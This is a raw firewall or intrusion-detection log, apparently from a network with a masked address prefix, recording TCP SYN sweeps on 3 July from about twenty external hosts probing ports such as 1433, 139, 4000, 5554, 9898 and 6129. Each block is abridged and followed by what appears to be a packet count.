Jul 3 20:32:38 69.70.72.33:1564 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 3 20:32:41 69.70.72.33:1493 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 3 20:32:43 69.70.72.33:1551 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 3 20:32:43 69.70.72.33:1553 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 3 20:32:43 69.70.72.33:1560 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 3 20:32:43 69.70.72.33:1559 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 3 20:32:44 69.70.72.33:1564 -> xxx.yyy.255.254:1433 SYN ******S*
122554

Jul 3 07:34:07 218.164.183.126:4746 -> xxx.yyy.1.3:139 SYN ******S*
Jul 3 07:34:07 218.164.183.126:4740 -> xxx.yyy.1.2:139 SYN ******S*
Jul 3 07:34:04 218.164.183.126:4749 -> xxx.yyy.1.4:139 SYN ******S*
Jul 3 07:34:07 218.164.183.126:4751 -> xxx.yyy.1.5:139 SYN ******S*
Jul 3 07:34:07 218.164.183.126:4760 -> xxx.yyy.1.1:139 SYN ******S*
Jul 3 07:34:04 218.164.183.126:4770 -> xxx.yyy.1.7:139 SYN ******S*
Jul 3 07:34:04 218.164.183.126:4775 -> xxx.yyy.1.9:139 SYN ******S*
Jul 3 07:34:07 218.164.183.126:4766 -> xxx.yyy.1.6:139 SYN ******S*
[...]
Jul 3 11:25:27 218.164.183.126:2166 -> xxx.yyy.255.247:139 SYN ******S*
Jul 3 11:25:27 218.164.183.126:2167 -> xxx.yyy.255.248:139 SYN ******S*
Jul 3 11:25:28 218.164.183.126:2169 -> xxx.yyy.255.250:139 SYN ******S*
Jul 3 11:25:28 218.164.183.126:2168 -> xxx.yyy.255.249:139 SYN ******S*
Jul 3 11:25:28 218.164.183.126:2176 -> xxx.yyy.255.251:139 SYN ******S*
Jul 3 11:25:28 218.164.183.126:2177 -> xxx.yyy.255.252:139 SYN ******S*
Jul 3 11:25:28 218.164.183.126:2179 -> xxx.yyy.255.253:139 SYN ******S*
Jul 3 11:25:28 218.164.183.126:2182 -> xxx.yyy.255.254:139 SYN ******S*
119916

Jul 3 13:36:34 4.47.246.208:62811 -> xxx.yyy.1.0:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62495 -> xxx.yyy.1.1:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62845 -> xxx.yyy.1.2:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62497 -> xxx.yyy.1.3:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62831 -> xxx.yyy.1.4:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62499 -> xxx.yyy.1.5:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62814 -> xxx.yyy.1.6:139 SYN ******S*
Jul 3 13:36:34 4.47.246.208:62501 -> xxx.yyy.1.7:139 SYN ******S*
[...]
Jul 3 13:59:28 4.47.246.208:64034 -> xxx.yyy.255.150:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:64038 -> xxx.yyy.255.153:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:60133 -> xxx.yyy.255.156:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:60080 -> xxx.yyy.255.174:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:60137 -> xxx.yyy.255.177:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:60140 -> xxx.yyy.255.187:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:64063 -> xxx.yyy.255.198:139 SYN ******S*
Jul 3 13:59:28 4.47.246.208:64079 -> xxx.yyy.255.207:139 SYN ******S*
94289

Jul 3 11:58:25 69.144.235.170:1921 -> xxx.yyy.1.59:139 SYN ******S*
Jul 3 11:58:25 69.144.235.170:1932 -> xxx.yyy.1.63:139 SYN ******S*
Jul 3 11:58:25 69.144.235.170:1930 -> xxx.yyy.1.62:139 SYN ******S*
Jul 3 11:58:25 69.144.235.170:1934 -> xxx.yyy.1.64:139 SYN ******S*
Jul 3 11:58:25 69.144.235.170:1936 -> xxx.yyy.1.65:139 SYN ******S*
Jul 3 11:58:22 69.144.235.170:1954 -> xxx.yyy.1.74:139 SYN ******S*
Jul 3 11:58:25 69.144.235.170:1956 -> xxx.yyy.1.75:139 SYN ******S*
Jul 3 11:58:25 69.144.235.170:1984 -> xxx.yyy.1.86:139 SYN ******S*
[...]
Jul 3 15:46:57 69.144.235.170:2615 -> xxx.yyy.255.245:139 SYN ******S*
Jul 3 15:46:57 69.144.235.170:2616 -> xxx.yyy.255.246:139 SYN ******S*
Jul 3 15:46:57 69.144.235.170:2618 -> xxx.yyy.255.247:139 SYN ******S*
Jul 3 15:46:57 69.144.235.170:2621 -> xxx.yyy.255.248:139 SYN ******S*
Jul 3 15:46:57 69.144.235.170:2622 -> xxx.yyy.255.249:139 SYN ******S*
Jul 3 15:46:57 69.144.235.170:2624 -> xxx.yyy.255.250:139 SYN ******S*
Jul 3 15:46:58 69.144.235.170:2625 -> xxx.yyy.255.251:139 SYN ******S*
Jul 3 15:46:58 69.144.235.170:2630 -> xxx.yyy.255.252:139 SYN ******S*
Jul 3 15:46:58 69.144.235.170:2636 -> xxx.yyy.255.254:139 SYN ******S*
78403

Jul 3 11:09:42 216.74.15.170:2713 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2715 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2716 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2718 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2717 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2719 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2720 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 3 11:09:42 216.74.15.170:2721 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 3 11:47:42 216.74.15.170:1685 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1681 -> xxx.yyy.255.243:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1683 -> xxx.yyy.255.245:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1686 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1688 -> xxx.yyy.255.250:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1690 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1692 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1689 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 3 11:47:42 216.74.15.170:1691 -> xxx.yyy.255.253:1433 SYN ******S*
75585

Jul 3 04:35:00 4.23.173.111:3853 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3854 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3855 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3856 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3857 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3858 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3859 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 3 04:35:03 4.23.173.111:3860 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 3 04:46:17 4.23.173.111:2453 -> xxx.yyy.255.235:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2472 -> xxx.yyy.255.254:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2469 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2466 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2470 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2467 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2471 -> xxx.yyy.255.253:1433 SYN ******S*
Jul 3 04:46:18 4.23.173.111:2468 -> xxx.yyy.255.250:1433 SYN ******S*
74630

Jul 3 02:16:45 140.114.210.90:4775 -> xxx.yyy.1.1:4000 SYN ******S*
Jul 3 02:16:45 140.114.210.90:4892 -> xxx.yyy.1.2:4000 SYN ******S*
Jul 3 02:16:45 140.114.210.90:1026 -> xxx.yyy.1.3:4000 SYN ******S*
Jul 3 02:16:47 140.114.210.90:1027 -> xxx.yyy.1.4:4000 SYN ******S*
Jul 3 02:16:47 140.114.210.90:1028 -> xxx.yyy.1.5:4000 SYN ******S*
Jul 3 02:16:47 140.114.210.90:1029 -> xxx.yyy.1.6:4000 SYN ******S*
Jul 3 02:16:47 140.114.210.90:1030 -> xxx.yyy.1.7:4000 SYN ******S*
Jul 3 02:16:47 140.114.210.90:1031 -> xxx.yyy.1.8:4000 SYN ******S*
[...]
Jul 3 02:28:28 140.114.210.90:3467 -> xxx.yyy.255.251:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3469 -> xxx.yyy.255.253:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3462 -> xxx.yyy.255.246:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3463 -> xxx.yyy.255.247:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3465 -> xxx.yyy.255.249:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3466 -> xxx.yyy.255.250:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3468 -> xxx.yyy.255.252:4000 SYN ******S*
Jul 3 02:28:28 140.114.210.90:3470 -> xxx.yyy.255.254:4000 SYN ******S*
73748

Jul 3 21:19:45 212.240.38.132:4144 -> xxx.yyy.1.1:5554 SYN ******S*
Jul 3 21:19:45 212.240.38.132:4145 -> xxx.yyy.1.2:5554 SYN ******S*
Jul 3 21:19:45 212.240.38.132:4146 -> xxx.yyy.1.3:5554 SYN ******S*
Jul 3 21:19:44 212.240.38.132:4147 -> xxx.yyy.1.4:5554 SYN ******S*
Jul 3 21:19:47 212.240.38.132:4148 -> xxx.yyy.1.5:5554 SYN ******S*
Jul 3 21:19:47 212.240.38.132:4149 -> xxx.yyy.1.6:5554 SYN ******S*
Jul 3 21:19:47 212.240.38.132:4150 -> xxx.yyy.1.7:5554 SYN ******S*
Jul 3 21:19:47 212.240.38.132:4151 -> xxx.yyy.1.8:5554 SYN ******S*
[...]
Jul 3 21:30:43 212.240.38.132:3106 -> xxx.yyy.255.246:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3110 -> xxx.yyy.255.250:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3107 -> xxx.yyy.255.247:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3104 -> xxx.yyy.255.244:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3111 -> xxx.yyy.255.251:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3108 -> xxx.yyy.255.248:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3105 -> xxx.yyy.255.245:5554 SYN ******S*
Jul 3 21:30:43 212.240.38.132:3114 -> xxx.yyy.255.254:5554 SYN ******S*
73575

Jul 3 10:50:29 83.130.151.105:2179 -> xxx.yyy.1.1:8000 SYN ******S*
Jul 3 10:50:29 83.130.151.105:2180 -> xxx.yyy.1.2:8000 SYN ******S*
Jul 3 10:50:30 83.130.151.105:2182 -> xxx.yyy.1.3:8000 SYN ******S*
Jul 3 10:50:31 83.130.151.105:2183 -> xxx.yyy.1.4:8000 SYN ******S*
Jul 3 10:50:31 83.130.151.105:2184 -> xxx.yyy.1.5:8000 SYN ******S*
Jul 3 10:50:31 83.130.151.105:2185 -> xxx.yyy.1.6:8000 SYN ******S*
Jul 3 10:50:31 83.130.151.105:2186 -> xxx.yyy.1.7:8000 SYN ******S*
Jul 3 10:50:31 83.130.151.105:2187 -> xxx.yyy.1.8:8000 SYN ******S*
[...]
Jul 3 11:05:02 83.130.151.105:2109 -> xxx.yyy.255.246:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2110 -> xxx.yyy.255.247:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2111 -> xxx.yyy.255.248:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2112 -> xxx.yyy.255.249:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2113 -> xxx.yyy.255.250:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2114 -> xxx.yyy.255.251:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2115 -> xxx.yyy.255.252:8000 SYN ******S*
Jul 3 11:05:02 83.130.151.105:2116 -> xxx.yyy.255.253:8000 SYN ******S*
71820

Jul 3 14:07:38 138.130.219.4:3117 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 3 14:07:38 138.130.219.4:3118 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 3 14:07:38 138.130.219.4:3119 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 3 14:07:38 138.130.219.4:3120 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 3 14:07:38 138.130.219.4:3121 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 3 14:07:38 138.130.219.4:3122 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 3 14:07:35 138.130.219.4:3123 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 3 14:07:38 138.130.219.4:3124 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 3 14:19:18 138.130.219.4:3315 -> xxx.yyy.255.198:1433 SYN ******S*
Jul 3 14:19:18 138.130.219.4:3329 -> xxx.yyy.255.212:1433 SYN ******S*
Jul 3 14:19:18 138.130.219.4:3326 -> xxx.yyy.255.209:1433 SYN ******S*
Jul 3 14:19:18 138.130.219.4:3325 -> xxx.yyy.255.208:1433 SYN ******S*
Jul 3 14:19:18 138.130.219.4:3327 -> xxx.yyy.255.210:1433 SYN ******S*
Jul 3 14:19:18 138.130.219.4:3331 -> xxx.yyy.255.214:1433 SYN ******S*
Jul 3 14:19:18 138.130.219.4:3328 -> xxx.yyy.255.211:1433 SYN ******S*
Jul 3 14:19:19 138.130.219.4:3336 -> xxx.yyy.255.218:1433 SYN ******S*
Jul 3 14:19:19 138.130.219.4:3335 -> xxx.yyy.255.217:1433 SYN ******S*
71758

Jul 3 23:05:00 207.81.156.132:2991 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 3 23:05:00 207.81.156.132:2993 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 3 23:05:00 207.81.156.132:2995 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 3 23:05:00 207.81.156.132:2997 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 3 23:04:57 207.81.156.132:3006 -> xxx.yyy.1.8:1433 SYN ******S*
Jul 3 23:04:57 207.81.156.132:3007 -> xxx.yyy.1.9:1433 SYN ******S*
Jul 3 23:05:00 207.81.156.132:3009 -> xxx.yyy.1.10:1433 SYN ******S*
Jul 3 23:05:00 207.81.156.132:3011 -> xxx.yyy.1.11:1433 SYN ******S*
[...]
Jul 3 23:16:40 207.81.156.132:3270 -> xxx.yyy.255.242:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3282 -> xxx.yyy.255.248:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3288 -> xxx.yyy.255.251:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3278 -> xxx.yyy.255.246:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3284 -> xxx.yyy.255.249:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3290 -> xxx.yyy.255.252:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3280 -> xxx.yyy.255.247:1433 SYN ******S*
Jul 3 23:16:40 207.81.156.132:3286 -> xxx.yyy.255.250:1433 SYN ******S*
71270

Jul 3 20:36:44 217.79.87.60:3346 -> xxx.yyy.1.27:446 SYN ******S*
Jul 3 20:36:44 217.79.87.60:3353 -> xxx.yyy.1.28:446 SYN ******S*
Jul 3 20:36:45 217.79.87.60:3360 -> xxx.yyy.1.29:446 SYN ******S*
Jul 3 20:36:44 217.79.87.60:3368 -> xxx.yyy.1.30:446 SYN ******S*
Jul 3 20:36:45 217.79.87.60:3380 -> xxx.yyy.1.31:446 SYN ******S*
Jul 3 20:36:44 217.79.87.60:3389 -> xxx.yyy.1.32:446 SYN ******S*
Jul 3 20:36:44 217.79.87.60:3394 -> xxx.yyy.1.33:446 SYN ******S*
Jul 3 20:36:44 217.79.87.60:3403 -> xxx.yyy.1.40:446 SYN ******S*
[...]
Jul 3 20:45:12 217.79.87.60:1071 -> xxx.yyy.255.219:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1067 -> xxx.yyy.255.218:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1063 -> xxx.yyy.255.217:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1060 -> xxx.yyy.255.216:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1056 -> xxx.yyy.255.215:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1078 -> xxx.yyy.255.229:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1075 -> xxx.yyy.255.228:3410 SYN ******S* Jul 3 20:45:12 217.79.87.60:1081 -> xxx.yyy.255.244:3410 SYN ******S* 60175 Jul 3 13:38:26 82.255.170.95:3033 -> xxx.yyy.1.9:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3035 -> xxx.yyy.1.10:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3037 -> xxx.yyy.1.12:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3039 -> xxx.yyy.1.13:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3041 -> xxx.yyy.1.14:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:4714 -> xxx.yyy.1.15:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3045 -> xxx.yyy.1.17:21 SYN ******S* Jul 3 13:38:26 82.255.170.95:3047 -> xxx.yyy.1.18:21 SYN ******S* [...] 
Jul 3 14:50:25 82.255.170.95:3778 -> xxx.yyy.255.225:21 SYN ******S* Jul 3 14:50:25 82.255.170.95:3781 -> xxx.yyy.255.253:21 SYN ******S* Jul 3 14:50:26 82.255.170.95:3877 -> xxx.yyy.255.248:21 SYN ******S* Jul 3 14:50:27 82.255.170.95:3810 -> xxx.yyy.255.250:21 SYN ******S* Jul 3 14:50:28 82.255.170.95:3728 -> xxx.yyy.255.249:21 SYN ******S* Jul 3 14:50:31 82.255.170.95:3778 -> xxx.yyy.255.225:21 SYN ******S* Jul 3 14:50:31 82.255.170.95:3781 -> xxx.yyy.255.253:21 SYN ******S* Jul 3 14:50:32 82.255.170.95:3798 -> xxx.yyy.255.239:21 SYN ******S* Jul 3 14:50:32 82.255.170.95:3802 -> xxx.yyy.255.242:21 SYN ******S* 59817 Jul 3 02:49:40 202.2.80.122:2741 -> xxx.yyy.1.1:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2744 -> xxx.yyy.1.4:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2743 -> xxx.yyy.1.3:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2740 -> xxx.yyy.1.0:1433 SYN ******S* Jul 3 02:49:40 202.2.80.122:2742 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 02:49:41 202.2.80.122:2745 -> xxx.yyy.1.5:1433 SYN ******S* Jul 3 02:49:41 202.2.80.122:2748 -> xxx.yyy.1.8:1433 SYN ******S* Jul 3 02:49:41 202.2.80.122:2749 -> xxx.yyy.1.9:1433 SYN ******S* [...] 
Jul 3 02:55:57 202.2.80.122:2754 -> xxx.yyy.255.244:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2705 -> xxx.yyy.255.245:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2709 -> xxx.yyy.255.249:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2710 -> xxx.yyy.255.250:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2713 -> xxx.yyy.255.253:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2712 -> xxx.yyy.255.252:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2714 -> xxx.yyy.255.254:1433 SYN ******S* Jul 3 02:55:57 202.2.80.122:2711 -> xxx.yyy.255.251:1433 SYN ******S* 44145 Jul 3 21:29:58 221.116.253.130:1085 -> xxx.yyy.1.0:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1087 -> xxx.yyy.1.2:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1088 -> xxx.yyy.1.3:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1099 -> xxx.yyy.1.14:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1089 -> xxx.yyy.1.4:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1092 -> xxx.yyy.1.7:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1091 -> xxx.yyy.1.6:111 SYN ******S* Jul 3 21:29:58 221.116.253.130:1094 -> xxx.yyy.1.9:111 SYN ******S* [...] 
Jul 3 21:33:16 221.116.253.130:2497 -> xxx.yyy.255.242:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2498 -> xxx.yyy.255.243:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2487 -> xxx.yyy.255.232:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2489 -> xxx.yyy.255.234:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2499 -> xxx.yyy.255.244:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2501 -> xxx.yyy.255.246:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2494 -> xxx.yyy.255.239:111 SYN ******S* Jul 3 21:33:16 221.116.253.130:2492 -> xxx.yyy.255.237:111 SYN ******S* 38078 Jul 3 02:52:34 218.4.138.212:4859 -> xxx.yyy.1.2:6129 SYN ******S* Jul 3 02:52:31 218.4.138.212:4860 -> xxx.yyy.1.3:6129 SYN ******S* Jul 3 02:52:31 218.4.138.212:4861 -> xxx.yyy.1.4:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4858 -> xxx.yyy.1.1:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4869 -> xxx.yyy.1.12:6129 SYN ******S* Jul 3 02:52:31 218.4.138.212:4863 -> xxx.yyy.1.6:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4864 -> xxx.yyy.1.7:6129 SYN ******S* Jul 3 02:52:34 218.4.138.212:4875 -> xxx.yyy.1.18:6129 SYN ******S* [...] 
Jul 3 03:02:43 218.4.138.212:4266 -> xxx.yyy.236.62:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4277 -> xxx.yyy.236.73:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4272 -> xxx.yyy.236.68:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4274 -> xxx.yyy.236.70:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4270 -> xxx.yyy.236.66:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4286 -> xxx.yyy.236.82:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4283 -> xxx.yyy.236.79:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4293 -> xxx.yyy.236.89:6129 SYN ******S* Jul 3 03:02:43 218.4.138.212:4294 -> xxx.yyy.236.90:6129 SYN ******S* 35324 Jul 3 05:15:58 128.82.8.161:4375 -> xxx.yyy.1.1:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4376 -> xxx.yyy.1.2:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4377 -> xxx.yyy.1.3:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4378 -> xxx.yyy.1.4:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4379 -> xxx.yyy.1.5:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4380 -> xxx.yyy.1.6:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4381 -> xxx.yyy.1.7:4000 SYN ******S* Jul 3 05:15:58 128.82.8.161:4382 -> xxx.yyy.1.8:4000 SYN ******S* [...] 
Jul 3 05:27:00 128.82.8.161:4351 -> xxx.yyy.255.247:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4352 -> xxx.yyy.255.248:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4353 -> xxx.yyy.255.249:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4354 -> xxx.yyy.255.250:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4355 -> xxx.yyy.255.251:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4356 -> xxx.yyy.255.252:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4357 -> xxx.yyy.255.253:4000 SYN ******S* Jul 3 05:27:00 128.82.8.161:4358 -> xxx.yyy.255.254:4000 SYN ******S* 31206 Jul 3 15:57:27 68.78.72.190:4258 -> xxx.yyy.134.190:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4260 -> xxx.yyy.134.191:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4261 -> xxx.yyy.134.192:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4262 -> xxx.yyy.134.193:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4263 -> xxx.yyy.134.194:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4264 -> xxx.yyy.134.195:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4266 -> xxx.yyy.134.196:1433 SYN ******S* Jul 3 15:57:27 68.78.72.190:4267 -> xxx.yyy.134.197:1433 SYN ******S* [...] 
Jul 3 16:17:47 68.78.72.190:3629 -> xxx.yyy.157.45:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3630 -> xxx.yyy.157.46:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3631 -> xxx.yyy.157.47:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3632 -> xxx.yyy.157.48:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3633 -> xxx.yyy.157.49:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3634 -> xxx.yyy.157.50:1433 SYN ******S* Jul 3 16:17:47 68.78.72.190:3635 -> xxx.yyy.157.51:1433 SYN ******S* Jul 3 16:17:48 68.78.72.190:3636 -> xxx.yyy.157.52:1433 SYN ******S* Jul 3 16:17:48 68.78.72.190:3608 -> xxx.yyy.157.24:1433 SYN ******S* 15514 Jul 3 23:56:32 220.220.173.152:1504 -> xxx.yyy.174.2:5554 SYN ******S* Jul 3 23:56:33 220.220.173.152:1719 -> xxx.yyy.174.2:1023 SYN ******S* Jul 3 23:56:35 220.220.173.152:2386 -> xxx.yyy.174.2:9898 SYN ******S* Jul 3 23:56:32 220.220.173.152:1506 -> xxx.yyy.174.3:5554 SYN ******S* Jul 3 23:56:33 220.220.173.152:1721 -> xxx.yyy.174.3:1023 SYN ******S* Jul 3 23:56:35 220.220.173.152:2387 -> xxx.yyy.174.3:9898 SYN ******S* Jul 3 23:56:32 220.220.173.152:1511 -> xxx.yyy.174.5:5554 SYN ******S* Jul 3 23:56:33 220.220.173.152:1732 -> xxx.yyy.174.5:1023 SYN ******S* [...] 
Jul 3 23:59:35 220.220.173.152:2089 -> xxx.yyy.194.111:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2092 -> xxx.yyy.194.112:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2088 -> xxx.yyy.194.109:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2093 -> xxx.yyy.194.113:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2096 -> xxx.yyy.194.114:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2097 -> xxx.yyy.194.115:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2104 -> xxx.yyy.194.118:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2098 -> xxx.yyy.194.116:9898 SYN ******S* Jul 3 23:59:35 220.220.173.152:2101 -> xxx.yyy.194.117:9898 SYN ******S* 15397 Jul 3 19:46:13 83.129.127.41:23527 -> xxx.yyy.1.6:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:24451 -> xxx.yyy.1.2:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:23884 -> xxx.yyy.1.10:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:24479 -> xxx.yyy.1.17:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:26027 -> xxx.yyy.1.13:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:25887 -> xxx.yyy.1.24:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:21754 -> xxx.yyy.1.21:1433 SYN ******S* Jul 3 19:46:13 83.129.127.41:23556 -> xxx.yyy.1.29:1433 SYN ******S* [...] 
